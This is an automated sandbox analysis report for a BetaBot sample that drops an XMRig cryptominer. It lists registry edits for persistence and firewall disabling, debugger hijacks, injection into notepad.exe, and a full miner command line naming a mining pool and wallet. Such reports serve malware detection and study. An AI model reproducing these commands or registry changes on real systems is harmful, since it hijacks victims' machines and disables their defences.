Analysis Overview
SHA256
43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16
Threat Level: Known bad
The file 43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16 was found to be: Known bad.
Malicious Activity Summary
BetaBot
Modifies firewall policy service
xmrig
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
Modifies WinLogon for persistence
XMRig Miner payload
Executes dropped EXE
Sets file execution options in registry
UPX packed file
Checks BIOS information in registry
Drops startup file
Adds Run key to start application
Maps connected drives based on registry
Checks whether UAC is enabled
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Program crash
Modifies Internet Explorer Protected Mode Banner
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Modifies Internet Explorer settings
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: RenamesItself
Modifies Internet Explorer Protected Mode
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-07-07 23:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-07-07 23:58
Reported
2022-07-08 01:31
Platform
win7-20220414-en
Max time kernel
154s
Max time network
184s
Command Line
Signatures
BetaBot
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\e7c7efc\\colorcpl.exe" | C:\Windows\SysWOW64\msiexec.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sets file execution options in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gsyocy933ke1m3.exe | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gsyocy933ke1m3.exe\DisableExceptionChainValidation | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "ltjufqn.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoit.vbe | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\llass = "C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\gsyocy933ke1m3.exe\"" | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key created | \Registry\User\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Run\LPwNNTETTJ = "\"C:\\Users\\Admin\\AppData\\Local\\XICFNZ~1\\zcvhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 940 set thread context of 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | C:\Windows\notepad.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\explorer.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode Banner
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
C:\Windows\notepad.exe
"C:\Windows\notepad.exe" -o pool.monero.hashvault.pro:5555:80 -u 48g2oLrkRG5JtnYA1pUukrYHgsu6aBqGTVxzZx6av6wvhBtgTHrKquWXMY2BJNnxs3aqj3U5RMnoZ6HaZYRMUouU8ke7kC4 -p trainwreck -v 0 -t 2
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\msiexec.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pool.monero.hashvault.pro | udp |
| US | 8.8.8.8:53 | google.com | udp |
| NL | 142.250.179.142:80 | google.com | tcp |
| US | 8.8.8.8:53 | 145.127.208.144.in-addr.arpa | udp |
| US | 144.208.127.145:80 | 144.208.127.145 | tcp |
Files
memory/1928-54-0x0000000075CF1000-0x0000000075CF3000-memory.dmp
memory/1928-57-0x0000000000320000-0x0000000000327000-memory.dmp
memory/1484-58-0x0000000000000000-mapping.dmp
memory/940-61-0x0000000000000000-mapping.dmp
memory/1400-63-0x0000000000000000-mapping.dmp
memory/1928-64-0x0000000000320000-0x0000000000327000-memory.dmp
memory/940-66-0x0000000000400000-0x00000000004B7000-memory.dmp
memory/1400-65-0x0000000000400000-0x00000000004AA000-memory.dmp
memory/1484-60-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1484-59-0x0000000000400000-0x0000000000435000-memory.dmp
memory/940-69-0x0000000000400000-0x00000000004B7000-memory.dmp
memory/1400-70-0x0000000000400000-0x00000000004AA000-memory.dmp
memory/1484-71-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1180-75-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/1180-76-0x00000000004D3D30-mapping.dmp
memory/1180-77-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/1484-78-0x0000000000400000-0x0000000000435000-memory.dmp
memory/1180-79-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/1180-81-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/940-80-0x0000000000400000-0x00000000004B7000-memory.dmp
memory/1484-82-0x0000000002140000-0x00000000021A6000-memory.dmp
memory/1400-83-0x0000000000400000-0x00000000004AA000-memory.dmp
memory/1484-84-0x0000000002140000-0x00000000021A6000-memory.dmp
memory/1180-86-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/1484-87-0x0000000000270000-0x000000000027D000-memory.dmp
memory/1484-88-0x00000000007B0000-0x00000000007BC000-memory.dmp
memory/560-89-0x0000000000000000-mapping.dmp
memory/568-91-0x0000000000000000-mapping.dmp
memory/568-93-0x0000000074021000-0x0000000074023000-memory.dmp
memory/568-94-0x0000000077240000-0x00000000773C0000-memory.dmp
memory/568-95-0x0000000000110000-0x0000000000395000-memory.dmp
memory/568-96-0x0000000000570000-0x000000000057C000-memory.dmp
memory/1484-97-0x0000000002140000-0x00000000021A6000-memory.dmp
memory/1400-98-0x0000000000400000-0x00000000004AA000-memory.dmp
memory/560-99-0x0000000002220000-0x00000000024A5000-memory.dmp
memory/1180-101-0x0000000000000000-0x0000000000600000-memory.dmp
memory/560-100-0x0000000000360000-0x000000000036C000-memory.dmp
memory/1180-102-0x0000000000400000-0x00000000004DA000-memory.dmp
memory/568-103-0x0000000077240000-0x00000000773C0000-memory.dmp
memory/568-104-0x0000000000110000-0x0000000000395000-memory.dmp
memory/560-105-0x0000000002220000-0x00000000024A5000-memory.dmp
memory/1180-106-0x0000000000000000-0x0000000000600000-memory.dmp
memory/1556-107-0x0000000003A50000-0x0000000003A56000-memory.dmp
memory/1280-108-0x0000000002210000-0x0000000002216000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-07-07 23:58
Reported
2022-07-08 01:31
Platform
win10v2004-20220414-en
Max time kernel
152s
Max time network
157s
Command Line
Signatures
BetaBot
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\62ff808b\\PresentationHost.exe" | C:\Windows\SysWOW64\msiexec.exe | N/A |
Modifies firewall policy service
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" | C:\Windows\SysWOW64\explorer.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\windervt\3a9uw5a3e.exe | N/A |
Sets file execution options in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3a9uw5a3e.exe | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3a9uw5a3e.exe\DisableExceptionChainValidation | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "oxkvwsibs.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoit.vbe | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Key created | \Registry\User\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LPwNNTETTJ = "\"C:\\Users\\Admin\\AppData\\Local\\XICFNZ~1\\zcvhost.exe\"" | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\llass = "C:\\ProgramData\\windervt\\3a9uw5a3e.exe" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\3a9uw5a3e.exe\"" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\llass = "\"C:\\ProgramData\\windervt\\3a9uw5a3e.exe\"" | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3036 set thread context of 4424 | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | C:\Windows\notepad.exe |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer Protected Mode Banner
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" | C:\Windows\SysWOW64\explorer.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious behavior: RenamesItself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe | N/A |
| N/A | N/A | C:\ProgramData\windervt\3a9uw5a3e.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe
"C:\Users\Admin\AppData\Local\Temp\43181faf4b89af5f0bcaf4723d9424c7c723e3489f46286ea0c3b57483dc5b16.exe"
